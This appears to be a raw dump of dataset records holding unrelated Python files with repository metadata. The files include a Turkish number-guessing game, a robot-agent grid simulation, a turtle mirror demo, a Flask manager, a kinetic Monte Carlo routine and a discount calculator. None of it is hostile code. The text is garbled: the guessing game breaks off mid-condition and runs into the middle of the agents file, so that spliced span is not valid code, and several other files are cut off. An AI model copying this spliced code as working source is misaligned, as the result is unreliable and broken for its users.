'index.views.whitelist'),\n)\n","repo_name":"Dokifansubs/anidex_django","sub_path":"anidex_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24131310405","text":"import random\r\nsayı=random.randint(1,100)\r\nhak=int(input(\"kaç hakkınız olsun: \"))\r\ncan=hak\r\npuan=100\r\nwhile hak>0:\r\n hak-=1\r\n giris=int(input(\"tahimini sayi griniz: \"))\r\n if giris>sayı:\r\n puan-=(100/can)\r\n print(\"daha küçük\")\r\n elif giris 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n elif len(path) == 2:\r\n robot.drop()\r\n return\r\n\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n void_cells, dirty_cells = env_info['void-cells'], env_info['dirty-cells']\r\n return robot.check_dirty_alert(void_cells, dirty_cells)\r\n\r\n return Objective(find, perform, check_if_completed, name=\"dirty-alert\")\r\n\r\n @staticmethod\r\n def build_clean_objective():\r\n def find(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_dirt_len = rows * cols\r\n closest_dirt_pos = -1, -1\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Dirt) and visit[x][y] != 0 and visit[x][y] < closest_path_dirt_len:\r\n closest_path_dirt_len = visit[x][y]\r\n closest_dirt_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Dirt):\r\n closest_dirt_pos = robot.x, robot.y\r\n \r\n if closest_dirt_pos == (-1, -1):\r\n return [robot_pos]\r\n \r\n return build_path(robot_pos, closest_dirt_pos, pi)\r\n\r\n def perform(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n path = find(objective, env, robot, env_info)\r\n x, y = robot_pos\r\n\r\n if len(path) == 1:\r\n robot.clean(env)\r\n return\r\n \r\n if robot.carried_child: \r\n if len(path) > 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n elif len(path) == 2:\r\n robot.drop()\r\n return\r\n\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n rx, ry = robot.x, robot.y\r\n if objective.on_dirty_cell:\r\n objective.on_dirty_cell = False\r\n return True\r\n \r\n objective.on_dirty_cell = isinstance(env[rx][ry][1], Dirt)\r\n return False\r\n\r\n return Objective(find, perform, check_if_completed, name=\"clean\")\r\n \r\n @staticmethod\r\n def build_bring_children_to_playpen_objective():\r\n def find_child(env, robot):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_child_len = rows * cols\r\n closest_child_pos = -1, -1\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Child) and visit[x][y] != 0 and visit[x][y] < closest_path_child_len:\r\n closest_path_child_len = visit[x][y]\r\n closest_child_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Child):\r\n closest_child_pos = robot.x, robot.y\r\n \r\n if closest_child_pos == (-1, -1):\r\n return [robot_pos]\r\n \r\n return build_path(robot_pos, closest_child_pos, pi)\r\n \r\n def find_playpen(env, robot, children):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void), (Void, Playpen, Child))\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_playpen_len = rows * cols\r\n closest_playpen_pos = -1, -1\r\n in_play_pen = children_in_play_pen(env)\r\n\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Playpen) and visit[x][y] != 0 and visit[x][y] < closest_path_playpen_len and \\\r\n (in_play_pen == len(children) - 1 or not creates_a_barrier(env, (x,y), robot_pos)):\r\n closest_path_playpen_len = visit[x][y]\r\n closest_playpen_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Playpen):\r\n closest_playpen_pos = robot.x, robot.y\r\n \r\n pos = closest_playpen_pos\r\n\r\n if pos == (-1, -1):\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n farthest_path_playpen_len = 0\r\n farthest_playpen_pos = -1, -1\r\n\r\n target_cells = (Void, Playpen, Void),\r\n for x in range(rows):\r\n for y in range(cols):\r\n if match_types(env[x][y], target_cells) and visit[x][y] != 0 and visit[x][y] > farthest_path_playpen_len:\r\n farthest_path_playpen_len = visit[x][y]\r\n farthest_playpen_pos = x, y\r\n \r\n pos = farthest_playpen_pos\r\n \r\n return build_path(robot_pos, pos, pi)\r\n \r\n def find(objective, env, robot, env_info):\r\n children = env_info['children']\r\n return not robot.carried_child and find_child(env, robot) or find_playpen(env, robot, children)\r\n\r\n def perform(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n path = find(objective, env, robot, env_info)\r\n x, y = robot_pos\r\n\r\n if isinstance(env[x][y][1], Playpen) and robot.carried_child:\r\n robot.drop()\r\n return\r\n \r\n if robot.carried_child and len(path) >= 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n \r\n if len(path) > 1:\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n rx, ry = robot.x, robot.y\r\n return match_types(env[rx][ry], ((Agent, Playpen, Child),)) and not robot.carried_child\r\n\r\n return Objective(find, perform, check_if_completed, name=\"bring-children-to-playpen\")\r\n\r\n @staticmethod\r\n def build_clear_block_objective():\r\n def find(objective, env, robot, env_info):\r\n blocked_pos = env_info['blocked-position']\r\n robot_pos = robot.x, robot.y\r\n new_pos = blocked_pos\r\n if robot_pos == blocked_pos and robot.carried_child:\r\n obstacles = ((Void, Obstacle, Void), (Void, Playpen, Child))\r\n for dx, dy in directions:\r\n nx, ny = robot.x + dx, robot.y + dy\r\n if inside(env, nx, ny) and not match_types(env[nx][ny], obstacles):\r\n new_pos = nx, ny\r\n \r\n dx, dy = deterimine_direction(new_pos, robot_pos)\r\n # to leave the direction in unit when target blocked pos is 2 cells from robot\r\n dx, dy = dx and dx // abs(dx), dy and dy // abs(dy)\r\n path = []\r\n curr_x, curr_y = new_pos\r\n while (curr_x, curr_y) != robot_pos:\r\n path.append((curr_x, curr_y))\r\n curr_x, curr_y = curr_x + dx, curr_y + dy\r\n path.append(robot_pos)\r\n path.reverse()\r\n\r\n return path\r\n\r\n def perform(objective, env, robot, env_info):\r\n path = find(objective, env, robot, env_info)\r\n robot_pos = robot.x, robot.y\r\n blocked_pos = env_info['blocked-position']\r\n if robot_pos != blocked_pos and robot.carried_child:\r\n robot.drop()\r\n elif len(path) > 1:\r\n robot.move(env, env_info, path, 1)\r\n elif robot_pos == blocked_pos and isinstance(env[robot.x][robot.y][1], Dirt):\r\n robot.clean(env)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n bx, by = env_info['blocked-position']\r\n\r\n return isinstance(env[bx][by][1], (Void, Agent)) or \\\r\n (isinstance(env[bx][by][1], Playpen) and isinstance(env[bx][by][2], Void))\r\n\r\n return Objective(find, perform, check_if_completed, name=\"clear-block\")\r\n \r\n @staticmethod\r\n def build_move_in_playpen_objective():\r\n def find(objective, env, robot, env_info):\r\n return objective.path\r\n\r\n def perform(objective, env, robot, env_info):\r\n idx, path = objective.idx, objective.path\r\n robot_pos = robot.x, robot.y\r\n \r\n if idx == len(path):\r\n robot.drop()\r\n elif robot.carried_child:\r\n nx, ny = path[idx]\r\n if isinstance(env[nx][ny][2], Child):\r\n robot.drop()\r\n else:\r\n robot.move(env, env_info, path, idx)\r\n objective.idx += 1\r\n else:\r\n robot.move(env, env_info, path, idx)\r\n objective.idx += 1\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n idx, path = objective.idx, objective.path\r\n\r\n return idx == len(path)\r\n\r\n return Objective(find, perform, check_if_completed, name=\"move-in-playpen\")\r\n \r\n def __init__(self, find_func, perform_func, check_if_completed_func, name=None):\r\n self.is_in_course = False\r\n self.find = find_func\r\n self.perform = perform_func\r\n self.check_if_completed = check_if_completed_func\r\n self.name = name\r\n self.on_dirty_cell = False\r\n self.path = None\r\n self.idx = 0\r\n\r\nclass MySmartAgent(Agent):\r\n\r\n def __init__(self, x, y):\r\n super(MySmartAgent, self).__init__(x, y)\r\n self.carried_child = None\r\n dirty_alert = Objective.build_dirty_alert_objective()\r\n clean = Objective.build_clean_objective()\r\n bring_children_to_playpen = Objective.build_bring_children_to_playpen_objective()\r\n clear_block = Objective.build_clear_block_objective()\r\n move_in_playpen = Objective.build_move_in_playpen_objective()\r\n self.objectives = { \r\n dirty_alert.name: dirty_alert, clear_block.name: clear_block,\r\n bring_children_to_playpen.name : bring_children_to_playpen, clean.name: clean,\r\n move_in_playpen.name : move_in_playpen\r\n }\r\n \r\n def _move(self, new_pos, env):\r\n nx, ny = new_pos\r\n # Move to new_pos position\r\n x, y = self.x, self.y\r\n self.x, self.y = nx, ny\r\n o1, o2, o3 = env[x][y]\r\n \r\n if o1 == self:\r\n env[x][y] = Void(x, y), o2, o3\r\n elif o2 == self:\r\n env[x][y] = Void(x, y), o1, o3\r\n else:\r\n env[x][y] = o1, o2, Void(x, y)\r\n\r\n if self.carried_child:\r\n _, child_in_pos1, child_in_pos2 = env[x][y]\r\n if isinstance(child_in_pos2, Child):\r\n env[x][y] = Void(x, y), env[x][y][1], Void(x, y)\r\n else:\r\n env[x][y] = Void(x, y), Void(x, y), Void(x, y)\r\n\r\n if isinstance(env[nx][ny][1], Void):\r\n env[nx][ny] = Void(nx, ny), self, Void(nx, ny)\r\n else:\r\n env[nx][ny] = self, env[nx][ny][1], env[nx][ny][2]\r\n \r\n if self.carried_child:\r\n if isinstance(env[nx][ny][1], Playpen):\r\n env[nx][ny] = self, env[nx][ny][1], self.carried_child\r\n else:\r\n env[nx][ny] = self, self.carried_child, Void(nx, ny)\r\n \r\n def drop(self):\r\n if not self.carried_child:\r\n print('CALL TO DROP ON ROBOT WITH NO CARRIED CHILD')\r\n return\r\n \r\n self.carried_child = None\r\n \r\n def _carry_child(self, new_pos, env):\r\n nx, ny = new_pos\r\n # Move to new_pos position\r\n x, y = self.x, self.y\r\n self.x, self.y = nx, ny\r\n o1, o2, o3 = env[x][y]\r\n \r\n if o1 == self:\r\n env[x][y] = Void(x, y), o2, o3\r\n elif o2 == self:\r\n env[x][y] = Void(x, y), o1, o3\r\n else:\r\n env[x][y] = o1, o2, Void(x, y)\r\n\r\n _, child_in_pos1, child_in_pos2 = env[nx][ny]\r\n\r\n if isinstance(child_in_pos1, Child):\r\n env[nx][ny] = self, child_in_pos1, Void(nx, ny)\r\n self.carried_child = child_in_pos1\r\n else:\r\n env[nx][ny] = self, env[nx][ny][1], child_in_pos2\r\n self.carried_child = child_in_pos2\r\n\r\n def get_active_objective(self):\r\n active_objective = None\r\n for objective in self.objectives.values():\r\n if objective.is_in_course:\r\n active_objective = objective\r\n break\r\n \r\n return active_objective\r\n\r\n def trigger_clear_block_objective(self, env, env_info):\r\n active_objective = self.get_active_objective()\r\n if active_objective:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives['clear-block']\r\n active_objective.is_in_course = True\r\n self.perform_action(env, env_info)\r\n \r\n def trigger_move_in_playpen_objective(self, env, env_info, path, idx):\r\n active_objective = self.get_active_objective()\r\n if active_objective:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives['move-in-playpen']\r\n active_objective.is_in_course = True\r\n active_objective.path = path\r\n active_objective.idx = idx\r\n self.perform_action(env, env_info)\r\n\r\n def move(self, env, env_info, path, idx):\r\n children = env_info['children']\r\n nx, ny = path[idx]\r\n availables = ((Void, Void, Void), (Void, Playpen, Void))\r\n\r\n child_in_play_pen = ((Void, Playpen, Child),)\r\n if self.carried_child and match_types(env[nx][ny], child_in_play_pen):\r\n # trigger move-in-playpen objective\r\n self.trigger_move_in_playpen_objective(env, env_info, path, idx)\r\n return\r\n\r\n for child in children:\r\n child_pos = child.x, child.y\r\n if child_pos == path[idx]:\r\n if self.carried_child and not match_types(env[nx][ny], availables):\r\n # trigger clear-block objective\r\n env_info['blocked-position'] = nx, ny\r\n self.trigger_clear_block_objective(env, env_info)\r\n else:\r\n if self.carried_child:\r\n self.carried_child.x, self.carried_child.y = nx, ny\r\n self._carry_child(path[idx], env)\r\n return\r\n \r\n if self.carried_child and not match_types(env[nx][ny], availables):\r\n # trigger clear-block objective\r\n env_info['blocked-position'] = nx, ny\r\n self.trigger_clear_block_objective(env, env_info)\r\n else:\r\n if self.carried_child:\r\n self.carried_child.x, self.carried_child.y = nx, ny\r\n self._move(path[idx], env)\r\n\r\n def check_dirty_alert(self, void_cells, dirty_cells):\r\n return dirty_cells >= 0.55 * (void_cells + dirty_cells)\r\n \r\n def clean(self, env):\r\n x, y = self.x, self.y\r\n robot = env[x][y][0]\r\n env[x][y] = (Void(x, y), robot, Void(x, y))\r\n\r\n def get_closest_objective(self, env, pi, visit, objectives_targets=None):\r\n robot_pos = self.x, self.y\r\n rows, cols = len(env), len(env[0])\r\n\r\n closest_path_len = rows * cols\r\n closest_target_pos = -1, -1\r\n objectives_targets = objectives_targets or (self.carried_child and \\\r\n ((Void, Playpen, Void), (Void, Dirt, Void)) or ((Void, Child, Void), (Void, Dirt, Void)))\r\n\r\n for x in range(rows):\r\n for y in range(cols):\r\n if match_types(env[x][y], objectives_targets) and visit[x][y] != 0 and visit[x][y] < closest_path_len:\r\n closest_path_len = visit[x][y]\r\n closest_target_pos = x, y\r\n \r\n rx, ry = robot_pos\r\n if isinstance(env[rx][ry][1], Playpen) and self.carried_child or isinstance(env[rx][ry][1], Dirt):\r\n closest_target_pos = rx, ry\r\n \r\n tx, ty = closest_target_pos\r\n target = env[tx][ty][1]\r\n objectives_name = isinstance(target, Dirt) and 'clean' or 'bring-children-to-playpen'\r\n \r\n return objectives_name, closest_target_pos\r\n\r\n def perform_action(self, env, env_info):\r\n raise NotImplementedError\r\n\r\nclass ProactiveAgent(MySmartAgent):\r\n def __init__(self, x, y, ignored_objectives_limit=20):\r\n super(ProactiveAgent, self).__init__(x, y)\r\n self.ignored_objectives = 0\r\n self.ignored_objectives_limit = ignored_objectives_limit\r\n self.change_behaviour = False\r\n\r\n def perform_action(self, env, env_info):\r\n dirty_cells = env_info['dirty-cells']\r\n void_cells = env_info['void-cells']\r\n children = env_info['children']\r\n in_play_pen = env_info['in-play-pen']\r\n \r\n active_objective = self.get_active_objective()\r\n\r\n if self.ignored_objectives >= self.ignored_objectives_limit and (not active_objective or not active_objective.on_dirty_cell):\r\n self.ignored_objectives = 0\r\n self.change_behaviour = True\r\n\r\n if (not active_objective or active_objective.name != 'clear-block') and self.check_dirty_alert(void_cells, dirty_cells):\r\n for objective in self.objectives.values():\r\n objective.is_in_course = False\r\n \r\n self.objectives['dirty-alert'].is_in_course = True\r\n\r\n \r\n robot_pos = self.x, self.y\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n if active_objective:\r\n if active_objective.name not in ['clear-block', 'dirty-alert', 'move-in-playpen']:\r\n # Search closest objective\r\n closest_objective_name, closest_target_pos = self.get_closest_objective(env, pi, visit)\r\n if active_objective.name != closest_objective_name:\r\n if not self.change_behaviour:\r\n self.ignored_objectives += 1\r\n else:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n self.change_behaviour = False\r\n \r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.ignored_objectives = 0\r\n\r\n else:\r\n # Search closest objective\r\n objective_targets = None\r\n if in_play_pen < len(children):\r\n objective_targets = self.carried_child and ((Void, Playpen, Void),) or ((Void, Child, Void),)\r\n else:\r\n objective_targets = ((Void, Dirt, Void),)\r\n\r\n closest_objective_name, _ = self.get_closest_objective(env, pi, visit, objective_targets)\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.ignored_objectives = 0\r\n\r\nclass ReactiveAgent(MySmartAgent):\r\n def __init__(self, x, y, interrupted_objectives_limit=10):\r\n super(ReactiveAgent, self).__init__(x, y)\r\n self.interrupted_objectives = 0\r\n self.interrupted_objectives_limit = interrupted_objectives_limit\r\n self.change_behaviour = False\r\n \r\n def __name__(self):\r\n return 'ReactiveAgent'\r\n\r\n def perform_action(self, env, env_info):\r\n dirty_cells = env_info['dirty-cells']\r\n void_cells = env_info['void-cells']\r\n children = env_info['children']\r\n\r\n active_objective = self.get_active_objective()\r\n\r\n if self.interrupted_objectives >= self.interrupted_objectives_limit and (not active_objective or not active_objective.on_dirty_cell):\r\n self.interrupted_objectives_limit = 0\r\n self.change_behaviour = True\r\n\r\n if (not active_objective or active_objective.name != 'clear-block') and self.check_dirty_alert(void_cells, dirty_cells):\r\n for objective in self.objectives.values():\r\n objective.is_in_course = False\r\n \r\n self.objectives['dirty-alert'].is_in_course = True\r\n \r\n robot_pos = self.x, self.y\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n if active_objective:\r\n if active_objective.name not in ['clear-block', 'dirty-alert', 'move-in-playpen']:\r\n # Search closest objective\r\n closest_objective_name, closest_target_pos = self.get_closest_objective(env, pi, visit)\r\n if active_objective.name != closest_objective_name:\r\n if not self.change_behaviour and not self.carried_child:\r\n self.interrupted_objectives += 1\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n else:\r\n self.change_behaviour = False\r\n \r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.interrupted_objectives = 0\r\n else:\r\n # Search closest objective\r\n closest_objective_name, _ = self.get_closest_objective(env, pi, visit)\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.interrupted_objectives = 0","repo_name":"ginrod/agents","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":25170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35199829038","text":"import time\r\nimport turtle\r\nimport random\r\nfrom math import *\r\nwn = turtle.Screen()\r\nwn.title(\"Circular mirror\")\r\nwn.setup(500,500)\r\nwn.tracer(0)\r\nt = turtle.Turtle()\r\np = turtle.Turtle()\r\ntu = turtle.Turtle()\r\nt.hideturtle()\r\np.hideturtle()\r\ntu.hideturtle()\r\ntu.speed(0)\r\ndef C(r,tu):\r\n tu.color(\"black\",\"yellow\")\r\n tu.pu()\r\n tu.fd(r)\r\n tu.left(90)\r\n tu.pd()\r\n t.begin_fill()\r\n tu.circle(r)\r\n t.end_fill()\r\n tu.pu()\r\n tu.right(90)\r\n tu.bk(r)\r\nr = 5\r\nR =250\r\ntu.pu()\r\ntu.fd(R)\r\ntu.left(90)\r\ntu.pd()\r\ntu.circle(R)\r\ntu.pu()\r\ntu.right(90)\r\ntu.bk(R)\r\n\r\nt.pu()\r\nt.goto(random.randint(-100,100),random.randint(-100,100))\r\n# t.goto(0,245*sin(radians(30)))\r\np.pu()\r\np.goto(t.pos())\r\nt.setheading(random.randint(0,360))\r\nx = t.xcor()\r\ny = t.ycor()\r\np.pd()\r\nwhile True:\r\n while x**2 + y**2 <= (250-r)**2:\r\n t.fd(1)\r\n p.goto(t.pos())\r\n t.pd()\r\n C(r,t)\r\n t.pu()\r\n x = t.xcor()\r\n y = t.ycor()\r\n wn.update()\r\n time.sleep(0.001)\r\n t.clear()\r\n else:\r\n th = t.heading()-degrees(atan(y/x))\r\n alph = 180 - 2*th\r\n t.left(alph)\r\n t.fd(1)\r\n p.goto(t.pos())\r\n t.pd()\r\n C(r, t)\r\n t.pu()\r\n x = t.xcor()\r\n y = t.ycor()\r\n wn.update()\r\n time.sleep(0.001)\r\n t.clear()\r\n continue\r\n\r\n\r\nturtle.done()","repo_name":"DixonLYK/Dixon-s-Python-Turtle-Portfolio","sub_path":"Circular mirror.py","file_name":"Circular mirror.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24177734331","text":"import logging\nfrom app import create_app\nfrom flask_script import Manager\nfrom flask_migrate import MigrateCommand\n\napp = create_app('default')\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format=\"%(asctime)s[%(name)s][%(levelname)s] :%(levelno)s: %(message)s\",\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='logs/weChatService.log',\n filemode='a')\n manager.run()\n","repo_name":"Zhanben/wechatsite","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14978542277","text":"import argparse\nfrom time import sleep\nfrom os.path import splitext, join, exists\nfrom os import remove\n\n\ndef main():\n description = 'Compare different pedestal techniques'\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('-f', '--file', dest='input_path', action='store',\n required=True, help='path to the TIO run file')\n parser.add_argument('-T', '--time', dest='time', action='store',\n type=float, default=0.1,\n help='time to wait between line writes')\n\n args = parser.parse_args()\n\n ip = args.input_path\n op = splitext(ip)[0] + \"_sim.txt\"\n if exists(op):\n remove(op)\n\n with open(op, 'w+') as output:\n print(\"Writing to: {}\".format(op))\n with open(ip, 'r') as file:\n while True:\n line = file.readline()\n output.write(line)\n print(\"Wrote line: {}\".format(line))\n sleep(args.time)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"watsonjj/chec_operator","sub_path":"executables/simulate_monitor_write.py","file_name":"simulate_monitor_write.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18569751388","text":"from copy import deepcopy\nfrom helpers import *\n\nlines = getlines(5)\ntotal = 0\n\nbreakIndex = lines.index(\"\")\norigStacks = [[c for c in stack[::-1] if c != \" \"] for stack in zip(*(line[1::4] for line in lines[:breakIndex-1]))]\n\ndef run(part2):\n\tstacks = deepcopy(origStacks)\n\tfor line in lines[breakIndex+1:]:\n\t\t_, nToMove, _, fromInd, _, toInd = getparts(line, \" \", \"sisisi\")\n\t\ttop = stacks[fromInd-1][-nToMove:]\n\t\tstacks[toInd-1] += stacks[fromInd-1][-nToMove:][::1 if part2 else -1]\n\t\tstacks[fromInd-1] = stacks[fromInd-1][:-nToMove]\n\n\tprint(\"\".join([s[-1] for s in stacks if len(s) > 0]))\n\nrun(False)\nrun(True)","repo_name":"yokljo/aoc2022","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44265930661","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\n\nresponse = requests.get(\"https://news.ycombinator.com/\")\nyv_web_page = response.text\n\nsoup = BeautifulSoup(yv_web_page, \"html.parser\")\n\narticle_tag = soup.find(class_=\"titleline\").get_text()\narticle_text = soup.find(class_=\"titleline\").get(\"href\")\narticle_link = soup.find(class_=\"score\").get_text()\n\n\nprint(article_tag)\nprint(article_text)\nprint(article_link)\n\n\n\n","repo_name":"beatrizdile/python-bootcamp","sub_path":"Section-4-39/day-39-web-scraping-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14318951585","text":"import numpy as np\nimport random\nimport time\nimport common.physcons as pc\n\nfrom common.Exceptions import NoReacMol\nfrom common.criteria import EPS_FSTRICT\n\n\n\n#=====================================================#\ndef calculate_propensities(dxvec, processes):\n '''\n Calculates the propensitie of each reaction\n '''\n propensities = []\n total_propensity = 0.0\n for Rs,Ps,ks in processes:\n prop = ks\n for Ri in Rs: prop *= dxvec[Ri]\n propensities.append( prop )\n total_propensity += prop\n return propensities, total_propensity\n#-----------------------------------------------------#\ndef generate_random(eps=EPS_FSTRICT):\n '''\n Generates a random number, excluding those smaller than eps\n '''\n while True:\n randx=random.random() \n if randx >= eps: return randx\n#=====================================================#\n\n\n\n\n#=====================================================#\ndef kmc(ipops, processes, excess_species=None, volume=1.0/pc.ML, nstpdata=1000):\n '''\n ipops : dictionary with initial populations (only needed those != 0.0)\n processes: a list with the reactants, products and the rate constant\n processes[idx] = (Rs,Ps,k)\n\n INPUT UNITS: atomic units\n concentrations: molecules/bohr**3\n volume : bohr**3\n rate constants: in au\n '''\n\n #----------------------------#\n # set initial concentrations #\n # and reactant molecules #\n #----------------------------#\n reactants = []\n for Rs,Ps,k in processes:\n for species in Rs+Ps:\n if species not in ipops.keys(): ipops[species] = 0.0\n bool1 = species in excess_species\n bool2 = species in reactants\n if (not bool1) and (not bool2): reactants.append(species)\n\n #------------------------#\n # rate constants to s^-1 #\n #------------------------#\n for idx,(Rs,Ps,k) in enumerate(processes):\n nR = len(Rs)\n k /= volume**(nR-1)\n processes[idx] = (Rs,Ps,k)\n\n #-----------------------------------------#\n # Get dict of xvec and limiting molecules #\n #-----------------------------------------#\n dxvec = ipops.copy()\n try : N0 = min([pop for pop in dxvec.values() if pop != 0.0])\n except: N0 = 0.0\n if N0 == 0.0: raise NoReacMol(Exception)\n \n # --------------------------#\n # START KINETIC MONTE-CARLO #\n # --------------------------#\n # initialize variables\n tau, tx = 0.0, 0.0\n jcount = 0\n\n # data\n xvalues = [tx]\n yvalues = {key:[val] for key,val in dxvec.items()}\n\n Nj = N0\n xi = np.array([ dxvec[species] for species in sorted(dxvec.keys())])\n while Nj > 0.0:\n # compare each 1000 steps\n if jcount % 1000 == 0 and jcount > 0:\n xj = np.array([ dxvec[species] for species in sorted(dxvec.keys())])\n diff = np.linalg.norm(xj-xi)/1000\n if diff < 1e-4: break\n xi = xj\n # calculate propensities\n propensities, tot_propensity = calculate_propensities(dxvec,processes)\n #if tot_propensity < 1.e-15: break\n # generate two random numbers \n r1=generate_random() # 1) Tau (time)\n r2=generate_random() # 2) Changes in population\n # Select process (stacking)\n value = tot_propensity * r2\n sum_props = 0.0\n for target,prop in enumerate(propensities):\n sum_props += prop\n if sum_props >= value: break\n # Modify populations (except those in excess)\n Rs,Ps,ks = processes[target]\n for Ri in Rs:\n if Ri not in excess_species: dxvec[Ri] -= 1.0\n for Pi in Ps:\n if Pi not in excess_species: dxvec[Pi] += 1.0\n # Time step\n if tot_propensity == 0.0: break\n tau = np.log(1./r1)/tot_propensity\n tx += tau\n # Keep data\n jcount += 1\n if jcount%nstpdata==0:\n xvalues.append(tx)\n for specie in dxvec.keys():\n yvalues[specie].append( dxvec[specie] )\n \n # Calculate current number of reactant molecules\n Nj = sum([dxvec[specie] for specie in reactants])\n\n return xvalues, yvalues\n#=====================================================#\n\n\n","repo_name":"cathedralpkg/Pilgrim","sub_path":"src/modpilgrim/kmc.py","file_name":"kmc.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"39253072623","text":"def main():\n n = int(input(\"Insira a quantidade de pedidos: \"))\n \n total = 0\n \n for i in range(1, n + 1):\n pedido = input(\"Insira o nome do pedido: \").split(\" \")\n valor = float(input('Insira o valor do pedido: R$ '))\n total += valor\n\n valor_desconto = str(input(\"Insira o valor do desconto (10/20): \"))\n get_desc = valor_desconto[0] + valor_desconto[1]\n \n while(get_desc != '10' and get_desc != '20'):\n print(\"Desculpe, mas esse valor de desconto não se encontra disponível! Tente novamente!\")\n valor_desconto = (input(\"Insira o valor do desconto (10/20): \"))\n get_desc = valor_desconto[0] + valor_desconto[1]\n else:\n if get_desc == '10':\n desconto = total - (total * 0.1)\n print('')\n print(f'Valor total com desconto de 10%: R$ {desconto:.2f}')\n total = 0\n print('')\n elif get_desc == '20':\n desconto = total - (total * 0.2)\n print('')\n print(f'Valor total com desconto de 20%: R$ {desconto:.2f}')\n total = 0\n print('')\n else:\n return\n \n \nif __name__ == \"__main__\":\n 